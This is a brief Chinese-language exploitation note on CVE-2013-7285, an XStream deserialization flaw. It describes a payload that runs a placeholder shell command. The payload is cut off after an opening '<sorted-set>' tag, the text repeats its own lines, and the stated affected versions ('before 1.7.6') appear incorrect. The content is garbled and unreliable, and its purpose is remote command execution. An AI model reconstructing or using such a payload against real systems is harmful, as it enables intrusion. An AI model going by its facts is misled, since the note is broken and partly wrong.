【笔记】CVE-2013-7285漏洞利用
前言
Java的com.thoughtworks.xstream.XStream
包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
payload
<<command>>
:Shell命令
1 | <sorted-set> |
Java的com.thoughtworks.xstream.XStream
包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
<<command>>
:Shell命令
1 | <sorted-set> |